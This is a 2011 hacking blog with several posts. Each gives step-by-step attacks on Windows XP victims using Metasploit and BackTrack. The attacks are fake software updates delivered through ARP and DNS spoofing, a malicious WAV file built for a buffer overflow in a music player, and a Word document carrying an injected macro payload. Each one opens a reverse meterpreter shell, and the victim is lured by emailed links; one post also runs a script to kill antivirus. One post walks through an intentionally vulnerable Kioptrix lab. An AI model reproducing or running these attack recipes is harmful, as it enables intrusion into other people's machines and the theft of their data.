mardi 26 juillet 2011

owning win xp using fake updats



watch the video onlin : http://blip.tv/jac0bn3t/backtrack-fake-updats-54
download the video onlin : http://blip.tv/file/get/Jac0bn3t-backtrackFakeUpdats710.mp4
download the index.php+pircturs : http://www.mediafire.com/?oh9d6mhj3sjm7ak

what i have use :
OS : backtrack and winxp
camtasia studio recorder and editor
all other tools can be found on backtrack 5

hacking steps :
*the attacker want to hack the computer victim
*the victim and the attacker are in the same netwrok
*the attacker scann for live hosts using nmap
*nice he found the victim ip : 192.168.1.105
*the the attacker want to make a fake updats to the sys (i have choose the windows OS you can choose any os:linux and OSX the index.php is able to now what sys is the user using)
*i have create a windows backdoor.exe and i have past is the the web directory /var/www
*i have copy and past the picturs on web directory too /var/www
*i have start my http server using apache "service apache2 start"
*so now i have server on 192.168.1.106 and allowed to any one
*but how to change the request of the victim for a web site and send it back to mine "http:192.168.1.106"
* i use ettercap and dnsspoof
*ettercap :
* -i eth0 (your interface can be found using ifconfig )
* -T ( for text mode )
* -M ( for choosing the sniffing mode )
* arp:remote (the sniffing mode that he is able to change the packet way )
* /victim ip / /router ip / (router ip can be found using route -n )
*dnsspoof
*create a list of host that you want to the victim visite and then he well be redicted to you server
* - i eth0 (choose what ever your interface is )
* -f /direrctory of the text that you have create
*start listining on on metsploite
*and voila evry time the victim gonna viste a website he well be redicted to your website after he gonna see the page the you can edite as you want ,he gonna click on downlaod botton he well have the backdoor that have create and u got hre meterpreter session very easy and nice




notes :
*sorry for my bad english and ....

music : Dash Berlin feat Emma Hewitt - Waiting

lundi 18 juillet 2011

Owning Kioptrix Level 3



Introduction:
Kioptrix is a vuln by design OS made to we try on it pentration testing

view the video online : http://blip.tv/jac0bn3t/owning-kioptrix-level-3-5385433
download the video : http://blip.tv/file/get/Jac0bn3t-OwningKioptrixLevel3489.mp4

what i have use on this video :

*OS: backtrack 5 and Kioptrix
*camtasio studio recorder and editor
*all other software can be found on backtrack ( to simply backtrack 5 is the best)
*md5decrypter.co.uk (online md5 hash decrypter)

hacking steps :

*first we scan for live host using nmap :
"nmap -sn -n 192.168.1.100/24 (this value 192.168.*.* change on your dhcp server)"
*ok our target is a live
*lets scan for open ports and the version of evry port
"nmap -sS -sV 192.168.1.106 -n "
*nice we have httpd:80 open port and ssh:22 open port
*lets go a and check this web page ( a lote of pages and links )
*the attacker want to now all page of this web site
*i have use dirbuster for scanning this website i can see that ther is a page /gallery
*so lets check the code source of this page
*we found that we the web site is powerder by a gallery manager "gallerific"
*ok the attacker need exploit for me its exploit-db.com
*nice thi web application is vuln whit a possible sqli vulnrablity
*how to injecte the web site the way is on the video from 3:00 to 7:18
*ok nice we have the ssh usernames and password
*but the passwords are encrypted whit a md5 hash we need the decrypte the hash
*for me its md5decrypter.co.uk you can choose any online md5 decrypter
*and ther we go we have the real passwrds now lets go and connect over this system
"ssh 192.168.1.106 -l loneferret
*he gonna ask you for a password wel password is what we have decrypter find "starwars"

notes:
*sorry for my bad english
*backtrack 5 has bad transparency im working on the theme

vendredi 15 juillet 2011

metasploit vs fatplayer


view the video online:http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533
download the video: http://blip.tv/file/get/Jac0bn3t-metasploitFatplayerBufferOverview350.mp4

what i have use :

metasploite
OS:backtrack5 and Win xp SP 3
fatplayer
Camtasia recorder
mozilla firefox

hacking steps :

*i have look for a vuln music player and i have found that fatplayer the 06b version is vuln whit the buffer overview so i have create the backdoor on a wav fileformat nice

*start msfconsole

*exploit is :windows/fileformat/fatplayer_wav

*the commands of creating the backdoor are:
   *set FILENAME yourfilename.wav (i have name it playme.wav)
   *set OUTPUTPATH /root directory
   *payload windows/meterpreter/reverse_tcp
   *lhost= you ip using ifconfig
   *lport = any port you want to listen on on it (for me is 8080)
   *exploit to create the backdoor on wav file format

*download the vuln fatplayer 0.6

* rename your fatplayer_win32.exe and backdoor.wav with any name you choose (for me is "fatplayer_win32.exe======>fatplayer.exe" and "backdoor.wav=======>playme.wav")

*start apache2 server (all commands can be found at the last of the post)

*place you fatplayer_win.exe and backdoor.wav to "/var/www" to be easy to share whit your victim

*soscial engine you victim by sending an email whit your email manager (for me is ssmtp) whit the ip adresse of your apache server (you ip adresse can be found using ifconfig) like this yourip/backoor.wav and yourip/fatplayer.exe

*listing on the port that we have create the backdoor with (for me its 8080)
   *use exploit/multi/handler/
   *set lport= the port that you have use to create the payload (for me is 8080)
   *set lhost= your ip adresse (you can found it using ifconfig)
   *exploit (waiting for the victim to play the music )

*after the victim play the music you gonna get a meterpreter session open

*make some exiting scripts on meterpreter
   *run checkvm : to now if the system is a virtuel machin
   *run killav :to killing antivirus services
   *shell -i : the get the system shell

THE COMMANDS ARE :
cp : to copy and past cp /root/mydata.txt /etc/init.d/mydata.txt
mv : to rename file: mv mydata.txt data.txt
servic apache2 start : to start apache


Music:by savage garder
  *santa monica
   *animal song

jeudi 14 juillet 2011

install backtrack 5 on vmware workstation

backtrack: setup and introduction



view video onlin:http://blip.tv/jac0bn3t/install-backtrack-5-5349969
download the video:http://blip.tv/file/get/Jac0bn3t-installBacktrack5563.avi

what i have use
vmware wokrstation (you can use vmware player or virtuelbox whit free license)
camstudio recorder
camtasia video editor



this how to my way how i have install backtrack you:

*fist you got have much ram because backtrack is based on ubuntu so alease 2 gigs on your physical ram
*giv your virtuel 512 ram
*once evry thing is done start your virtuel machine and boot it
* startx for begennig the graphical mode and start the installer follow my and ther we go we done

Music : infected mushroom projet 100

mercredi 13 juillet 2011

Microsoft office files : injecting vb scripts

Microsoft Office Files : injection vb scripts
video url : http://blip.tv/jac0bn3t/office-files-injecting-vb-scripts-5370003
download url:http://blip.tv/file/get/Jac0bn3t-officeFilesInjectingVbScripts859.mp4


what i have use :
*samba client 
*metsploite
*OS:backtrack 5 and WIN xp SP2 and SP3
*Microsoft office word 2003
*video recording and editing whit camtasia studio 

steps:
*the backdoor was a '.doc' formate file and not a '.exe' since i now tha the victim
have microsoft office installed and .exe files are alomost all antivirus  detect theme

*i have create using metasploite a payload (windows/meterpreter/reverse_tcp/) whit a my
      --lhost  (0.0.0.0)
      --lport (8080 | you can choose any port you want listen to it )
      --encoder was "shakita_ga_nai"   to create  vbscript to inject the doc file and put on my localweb derectory to be easy to share whit my "helper maching" the  i have copy the vb  code that metasploit has make it and i have injected into a .doc file that i have put it into shared directory over network 192.168.*.* (doc directory)  then i have use samba client to connect from my backtrack maching into this shared folder (doc directory)

*i have copy the *.doc file that i have injecte from the sahred directory to using "cp" my localweb folder (/var/www) 
to be easy for the victim to dowload 
*the i have a send i message for my victim whit my server ip that i have startet using (/etc/init.d/apache2 start)
i have beging listinnig on my lhost and lport and payload that i have use them create  the payload
using and exploit multi/handler on metsploit and 

*wainting for the victim to connect back

*after the victim read the message and download the .doc file and run  then i m gonna access to the system whit meterpreter session open   and   run a shell